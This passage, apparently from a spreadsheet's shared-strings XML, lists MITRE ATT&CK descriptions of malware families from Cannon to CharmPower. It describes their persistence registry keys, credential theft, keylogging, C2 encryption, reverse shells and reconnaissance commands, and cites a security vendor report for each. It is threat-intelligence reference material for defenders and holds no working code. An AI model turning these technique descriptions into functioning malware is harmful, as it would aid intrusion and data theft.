    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain a list of processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can take a screenshot of the desktop.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather system information from the victim’s machine such as the OS version, machine name, and drive information.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather the username from the system.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can collect the current time zone information from the victim’s machine.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) adds the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt; to establish persistence.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) exfiltrates data in compressed chunks if a message is larger than 4096 bytes .(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to delete files.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) logs key strokes for configured processes and sends them back to the C2 server.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) can create a Windows account.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) obtains Windows logon password details.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts strings to make analysis more difficult.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) downloads an executable and injects it directly into a new process.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) lists running processes.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) checks the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;/code&gt; for proxy configurations information.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a plugin for VNC and Ammyy Admin Tool.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) enables concurrent Remote Desktop Protocol (RDP) sessions.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encodes the message body of HTTP traffic with Base64.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts the message body of HTTP traffic with RC2 (in CBC mode). [Carbanak](https://attack.mitre.org/software/S0030) also uses XOR with random keys for its communications.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>The [Carbanak](https://attack.mitre.org/software/S0030) malware communicates to its command server using HTTP with an encrypted payload.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to create a reverse shell.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queued an APC routine to explorer.exe by calling ZwQueueApcThread.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has installed a bootkit on the system to maintain persistence.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has captured credentials when a user performs login through a SSL session.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has hooked several Windows API functions to steal credentials.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s bootkit can inject a malicious DLL into the address space of running processes.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has exfiltrated data via HTTP to already established C2 servers.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.(Citation: ESET Carberp March 2012)(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has created a hidden file in the Startup folder of the current user.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can download and execute new plugins from the C2 server. (Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has masqueraded as Windows system file names, as well as "chkntfs.exe" and "syscron.exe".(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used XOR-based encryption to mask C2 server locations within the trojan.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected a list of running processes.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has searched the Image File Execution Options registry key for "Debugger" within every subkey.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has maintained persistence by placing itself inside the current user's startup folder.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can capture display screenshots with the screens_dll.dll plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queried the infected system's registry searching for specific registry keys associated with antivirus products.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected the operating system version from the infected system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can start a remote VNC session by downloading a new plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) decrypts task and configuration files for execution.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has a command to inject code into a process.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses HTTP to send data to the C2 server.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates a base directory that contains the files and folders that are collected.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses TCP and UDP for C2.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net group&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can list the processes on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) enumerates values in the Registry.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net view&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates several tasks for later execution to continue persistence on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can collect the IP address of the victims and other computers on the network using the commands: &lt;code&gt;ipconfig -all&lt;/code&gt; &lt;code&gt;nbtstat -n&lt;/code&gt;, and &lt;code&gt;nbtstat -s&lt;/code&gt;.(Citation: ESET Carbon Mar 2017)(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;netstat -r&lt;/code&gt; and &lt;code&gt;netstat -an&lt;/code&gt; commands.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the command &lt;code&gt;net time \\127.0.0.1&lt;/code&gt; to get information the system’s time.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use HTTP in C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use Pastebin to receive C2 commands.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) establishes persistence by creating a service and naming it based off the operating system version running on the current machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) applies compression to C2 traffic using the ZLIB library.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) decodes many of its artifacts and is decrypted (AES-128) after being downloaded.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can communicate over multiple C2 host and port combinations.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can uninstall itself, including deleting its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload).(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can download and execute additional payloads.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can log keystrokes.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) lures victims into executing malicious macros embedded within Microsoft Excel documents.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) sets &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cardinal RAT](https://attack.mitre.org/software/S0348) encodes many of its artifacts and is encrypted (AES-128) when downloaded.(Citation: PaloAlto CardinalRat Apr 2017) </t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that ensures its process is always running, else spawns a new instance.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) injects into a newly spawned process created from a native Windows executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can act as a reverse proxy.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that periodically ensures &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; is set to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) establishes Persistence by setting the  &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; Registry key to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can capture screenshots.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the username from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is downloaded using HTTP over port 443.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can execute commands.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) obtains application windows titles and then determines which windows to perform [Screen Capture](https://attack.mitre.org/techniques/T1113) on.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) steals data stored in the clipboard.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) collects keystrokes from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) stores the gathered data from the machine in .db files and .bmp files under four separate locations.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) creates three Registry keys to establish persistence by adding a [Windows Service](https://attack.mitre.org/techniques/T1543/003).(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) captures screenshots based on specific keywords in the window’s title.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) gathers the Mac address, IP address, and the network adapter information from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter to establish persistence.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to perform brute force attacks on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to collect information from the local database.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can upload files over the C2 channel.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can search for files in directories.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to download and upload files to the system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of local groups of users from a system.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a command to modify a Registry key.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a port scanner on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather a list of processes running on the machine.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a rootkit on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather the IP address from the victim's machine using the IP config command.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of user accounts from a victim's machine.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of the services from a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can run commands on the compromised asset with CMD functions.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) steals credentials stored inside Internet Explorer.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can alter the victim's proxy configuration.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim's %TEMP% directory path and version of Internet Explorer.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is capable of downloading files, including additional modules.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects its process identifier (PID) on the victim.(Citation: Palo Alto menuPass Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) establishes persistence by adding a Registry Run key.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[ChChes](https://attack.mitre.org/software/S0144) can encode C2 data with a custom technique that utilizes Base64.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)	</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can encrypt C2 traffic with AES or RC4.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim hostname, window resolution, and Microsoft Windows version.(Citation: Palo Alto menuPass Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) can steal login credentials and stored financial information from the browser.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used search order hijacking to load a malicious DLL.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has decrypted an AES encrypted binary file to trigger the download of other files.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used encryption for its C2 channel.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) can download additional files onto an infected machine.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has a module to perform any API hooking it desires.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used Installutill to download content.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) requires the user to click on the malicious Word document to execute the next part of the attack.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used an unsigned, crafted DLL module named &lt;code&gt;hha.dll&lt;/code&gt; that was designed to look like a legitimate 32-bit Windows DLL.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) stored its instructions in a config file in the Registry.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used .MSI files as an initial way to start the infection chain.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) used the &lt;code&gt;CreateFileW()&lt;/code&gt; API function with read permissions to access downloaded payloads.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used Python scripts for execution and the installation of additional files.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has added persistence via the Registry key &lt;code&gt;software\microsoft\windows\currentversion\run\microsoft windows html help&lt;/code&gt;.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) can capture screenshots of the infected machine.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has been delivered by sending victims a phishing email containing a malicious .docx file.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used Base64 to encode C2 communications.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used a script that extracts the web session cookie and sends it to the C2 server.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has collected system information, including the machine name and OS version.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has collected the username and UID from the infected machine.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used VBscript to execute malicious code.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used HTTP for C2 communications.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used [cmd](https://attack.mitre.org/software/S0106) to execute tasks on the system.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) conducts brute force attacks against SSH services to gain initial access.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>After initial compromise, [Chaos](https://attack.mitre.org/software/S0220) will download a second stage to establish a more permanent presence on the affected system.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can collect data and files from a compromised host.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can retrieve C2 domain information from actor-controlled S3 buckets.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can decrypt downloaded modules prior to execution.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can send victim data via FTP with credentials hardcoded in the script.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
